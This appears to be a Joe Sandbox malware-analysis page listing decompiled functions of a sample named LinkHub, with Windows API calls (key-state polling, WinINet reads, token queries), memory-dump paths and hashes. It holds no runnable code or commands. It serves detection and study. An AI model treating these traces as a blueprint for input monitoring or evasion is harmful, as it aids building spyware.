Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dc1d5eaf50138bacc1ad323c9dfd73b35839c3c492e63835316a7668ac14c2d3
Instruction ID: 33131432f0fc09a22c56c074dd1dc88d71848c4d7ec189454bb4f0abb03887a1
Opcode Fuzzy Hash: dc1d5eaf50138bacc1ad323c9dfd73b35839c3c492e63835316a7668ac14c2d3
Instruction Fuzzy Hash: EC41CF32A00200AFDB24DF79C881A5DB3F9EF88314F1585A9E616EB391E731ED01CB80

Function 00BB19CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BB19E1
ScreenToClient.USER32(00000000,?), ref: 00BB19FE
GetAsyncKeyState.USER32(00000001), ref: 00BB1A23
GetAsyncKeyState.USER32(00000002), ref: 00BB1A3D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: b145ee90f7065aa3f75ecb116ca9979f29d200d0362d40b711f48a25769eef51
Instruction ID: 59812e99fec1769e278f443564623779bc17569ae627002178e021ecd39fa429
Opcode Fuzzy Hash: b145ee90f7065aa3f75ecb116ca9979f29d200d0362d40b711f48a25769eef51
Instruction Fuzzy Hash: 73418C71A0410AEBDF059F68C854BFEB7B0FF05720F20865AE469A3290C7706A54CB51

Function 00C242B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00C24310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C24367
TranslateMessage.USER32(?), ref: 00C24390
DispatchMessageW.USER32(?), ref: 00C2439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C243AB

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 5471e2a5c040646316b90410fdf65eabff701b3200713f7ba83bd3ebe2d30af4
Instruction ID: 9bf3a9a44097121598e26f1bab5803dadabfbd3fa746a9c5bd18c97e0c79c06c
Opcode Fuzzy Hash: 5471e2a5c040646316b90410fdf65eabff701b3200713f7ba83bd3ebe2d30af4
Instruction Fuzzy Hash: F331D370544362DFEB3CDB74F848FBA3BA8AB01305F040569E472C29B0E7B49985CB25

Function 00C1224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C12262
PostMessageW.USER32(00000001,00000201,00000001), ref: 00C1230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00C12316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00C12327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C1232F

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 8348feddff51b366249cdb0d9cf29db7a8f3180eeb40372b161a556d34882b8c
Instruction ID: 6483b0bc1b300d3a9ea671c06f3c1f5b73891081b9468630d75f6cb66b6594b5
Opcode Fuzzy Hash: 8348feddff51b366249cdb0d9cf29db7a8f3180eeb40372b161a556d34882b8c
Instruction Fuzzy Hash: E131B175900219EFDB14CFA8CD89BDE7BB5FB06325F104225F926A72D0C7709A94EB90

Function 00C2D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00C2CC63,00000000), ref: 00C2D97D
InternetReadFile.WININET(?,00000000,?,?), ref: 00C2D9B4
GetLastError.KERNEL32(?,00000000,?,?,?,00C2CC63,00000000), ref: 00C2D9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,00C2CC63,00000000), ref: 00C2DA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,00C2CC63,00000000), ref: 00C2DA37

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: e5959cd8069a4227911422d93c28863b99fdfb15e8165a83ff32b9b60b67b360
Instruction ID: 57d7467bd2d17028a9f1d72414852f59583e4798095952c46c48ee22a377456f
Opcode Fuzzy Hash: e5959cd8069a4227911422d93c28863b99fdfb15e8165a83ff32b9b60b67b360
Instruction Fuzzy Hash: 70314F71504215EFDB20EFA6E884FAEBBF8EB24354B10446EF557D2550DB30EE409B60

Function 00C461A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C461E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 00C4623C
_wcslen.LIBCMT ref: 00C4624E
_wcslen.LIBCMT ref: 00C46259
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C462B5

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 81d5ab7be191d16ba2add35814b93ffe1044f10f58dc312b025f0b023970df9f
Instruction ID: e4bd61c5db30b5970178dea9dcb93a045072f81cedb4f87a38417cfc719fa070
Opcode Fuzzy Hash: 81d5ab7be191d16ba2add35814b93ffe1044f10f58dc312b025f0b023970df9f
Instruction Fuzzy Hash: 34218275900218ABDB20DFA4CC84AEEBBB8FF05724F104256FA25EA185D7709A85CF51

Function 00C3138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00C313AE
GetForegroundWindow.USER32 ref: 00C313C5
GetDC.USER32(00000000), ref: 00C31401
GetPixel.GDI32(00000000,?,00000003), ref: 00C3140D
ReleaseDC.USER32(00000000,00000003), ref: 00C31445

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 27d13ac451e555d1c0c8bb5a806b6885b6c426c114eb0e1b0c20fbf0f77e8209
Instruction ID: 247e4ad3f7308a04100eff9222d5f262848dff446552e266de1391f157bc01eb
Opcode Fuzzy Hash: 27d13ac451e555d1c0c8bb5a806b6885b6c426c114eb0e1b0c20fbf0f77e8209
Instruction Fuzzy Hash: C9218E3A600214AFD704EF65D884BAEBBF5FF49340B048469F85A97761CA70ED00DB90

Function 00BED13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00BED146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BED169

Part of subcall function 00BE3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BD0165,?,?,00C211D9,0000FFFF), ref: 00BE3BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BED18F
_free.LIBCMT ref: 00BED1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BED1B1

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f75665b0c56a3bbe9f923f2d6fda45a47aaf2841354a18a19ab1dd349800e738
Instruction ID: 2a4db7762ed38aafe2357e1bb117af90aac3f3066202cce69ef58ca4208bdb1c
Opcode Fuzzy Hash: f75665b0c56a3bbe9f923f2d6fda45a47aaf2841354a18a19ab1dd349800e738
Instruction Fuzzy Hash: 230171766016957F23217B7B5C8CE7F6AADEEC3BA131401A9FD05E6244DBA08D0191B2

Function 00C16078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00C1608D
_memcmp.LIBVCRUNTIME ref: 00C160AB
_memcmp.LIBVCRUNTIME ref: 00C160BE
_memcmp.LIBVCRUNTIME ref: 00C160D6
_memcmp.LIBVCRUNTIME ref: 00C160EE

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 0487caaf28fc6f6f0cf58ab6232df6052fe835550ba24a722cda2c462162d374
Instruction ID: 6c677c3bd34e87773a65714523c0436e5a442ed52ae5e5bda4efd6b79473c131
Opcode Fuzzy Hash: 0487caaf28fc6f6f0cf58ab6232df6052fe835550ba24a722cda2c462162d374
Instruction Fuzzy Hash: C101F5F17007057BD21056298C82FEBB36D9E06399B100476FD0A9A342F721EE94D2A9

Function 00BE316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(74DE2E40,?,?,00BDF64E,00BE3BD6,?,?,00BD0165,?,?,00C211D9,0000FFFF), ref: 00BE3170
_free.LIBCMT ref: 00BE31A5
_free.LIBCMT ref: 00BE31CC
SetLastError.KERNEL32(00000000), ref: 00BE31D9
SetLastError.KERNEL32(00000000), ref: 00BE31E2

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 8368fba4e944d522e5fcbf656ec1f2a1ab6388b58a24a5f24f8d72ba5453a389
Instruction ID: 332bc39a22e0a592799f6a4e28318ebae48dd4470700b4b64815cf6980c3a569
Opcode Fuzzy Hash: 8368fba4e944d522e5fcbf656ec1f2a1ab6388b58a24a5f24f8d72ba5453a389
Instruction Fuzzy Hash: 0C01D6766406802B961237379C8DF2F16EDEFD1F7172004ACF916B3291EF22CA014152

Function 00C108FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C10831,80070057,?,?,?,00C10C4E), ref: 00C1091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C10831,80070057,?,?), ref: 00C10936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C10831,80070057,?,?), ref: 00C10944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C10831,80070057,?), ref: 00C10954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C10831,80070057,?,?), ref: 00C10960

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: fbfaa21a3a1cbd82fcfa88f4e291ab9a47f6959a3d69daf7e6cff9ddd385e899
Instruction ID: be327ca1208a1292c602eadae00ab27b1e9ad61c1cbfce1f80575d495a9bc9c8
Opcode Fuzzy Hash: fbfaa21a3a1cbd82fcfa88f4e291ab9a47f6959a3d69daf7e6cff9ddd385e899
Instruction Fuzzy Hash: 090184B6600204AFEB105F55DC44BAE7BBDEB45752F240114F906D6112E7B1DEC0A7A0

Function 00C1F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00C1F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 00C1F2BC
Sleep.KERNEL32(00000000), ref: 00C1F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 00C1F2CE
Sleep.KERNEL32 ref: 00C1F30A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f67de848d6ae08a70d34d4e8ae4f428912c30fe505699057ac6108e3d1b77fdc
Instruction ID: 0b54f6c279666c5992cc2dc16d419113b63ba7a738252311112c815a6ed4da3f
Opcode Fuzzy Hash: f67de848d6ae08a70d34d4e8ae4f428912c30fe505699057ac6108e3d1b77fdc
Instruction Fuzzy Hash: AC01AD74D00619DBCF00AFB4D848BEDBB78FB0A310F40006AD922B2260CB309595D7A1

Function 00C11A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C11A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,00C114E7,?,?,?), ref: 00C11A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C114E7,?,?,?), ref: 00C11A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C114E7,?,?,?), ref: 00C11A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C11A99

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 3d99903382140360dfb63ad741d5b1c799d85cebd11add513f31a715701316b2
Instruction ID: ee19bcabb0c5f8b2d09a8800c06b2bd9c0f62468dd05f4de1ad5580c59d84af5
Opcode Fuzzy Hash: 3d99903382140360dfb63ad741d5b1c799d85cebd11add513f31a715701316b2
Instruction Fuzzy Hash: 7B016DB9601205BFDB115FA4EC48BAE3FADFF863A4B250418FD46C3360DA31DD409A60

Function 00C11960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C11976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C11982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C11991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C11998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C119AE

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9b17e10a159b434e0969b0ef479d1aeac0fb7689ab36e02cf5922fc203915e31
Instruction ID: a05eac2e6a7565f45c85d2766b109f1a7db8e15aedc967b8e60bc60c69731b87
Opcode Fuzzy Hash: 9b17e10a159b434e0969b0ef479d1aeac0fb7689ab36e02cf5922fc203915e31
Instruction Fuzzy Hash: F1F06279200301ABD7215FA4EC59F9A3B6DFF8A7A0F140414FE56C7260CA74DA408A60

Function 00C11900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C11916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C11922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C11931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C11938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C1194E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: bb7557e39fc7ef32f3dc0bb030c11945725795c0e6618da1d31daa68fe2cdce7
Instruction ID: 29750470ac5756fc0b25d9538f3ff06297ff8d336b731589954942ae7c7bca45
Opcode Fuzzy Hash: bb7557e39fc7ef32f3dc0bb030c11945725795c0e6618da1d31daa68fe2cdce7
Instruction Fuzzy Hash: C5F06279200301ABDB211FA5EC4DF9A3B6DFF8A7A0F140415FE56D7260CA74DC409A60

Function 00C20CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00C20B24,?,00C23D41,?,00000001,00BF3AF4,?), ref: 00C20CCB
CloseHandle.KERNEL32(?,?,?,?,00C20B24,?,00C23D41,?,00000001,00BF3AF4,?), ref: 00C20CD8
CloseHandle.KERNEL32(?,?,?,?,00C20B24,?,00C23D41,?,00000001,00BF3AF4,?), ref: 00C20CE5
CloseHandle.KERNEL32(?,?,?,?,00C20B24,?,00C23D41,?,00000001,00BF3AF4,?), ref: 00C20CF2
CloseHandle.KERNEL32(?,?,?,?,00C20B24,?,00C23D41,?,00000001,00BF3AF4,?), ref: 00C20CFF
CloseHandle.KERNEL32(?,?,?,?,00C20B24,?,00C23D41,?,00000001,00BF3AF4,?), ref: 00C20D0C

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5da2adc7c3b2fe09a10d9ca2cba2393ba03cb001ab1a6f0976cd83a7cf82181f
Instruction ID: 1f09a69f57e92c63282c98a302db7f0170e963c9eba524b594f115f824d10151
Opcode Fuzzy Hash: 5da2adc7c3b2fe09a10d9ca2cba2393ba03cb001ab1a6f0976cd83a7cf82181f
Instruction Fuzzy Hash: 740190B5801B259FCB30AF66E980816F7F5BE503153258A3FD1A652932C7B0AA44DE81

Function 00C165AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C165BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C165D6
MessageBeep.USER32(00000000), ref: 00C165EE
KillTimer.USER32(?,0000040A), ref: 00C1660A
EndDialog.USER32(?,00000001), ref: 00C16624

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: ae074d70a99a0821b7eb23109e6ebdb87f4781d2e39e8a0b669bd293c6587cac
Instruction ID: 17255169ee4c3b42c47f77040ebf194abc3d79caf87ca7b565148267d41798d2
Opcode Fuzzy Hash: ae074d70a99a0821b7eb23109e6ebdb87f4781d2e39e8a0b669bd293c6587cac
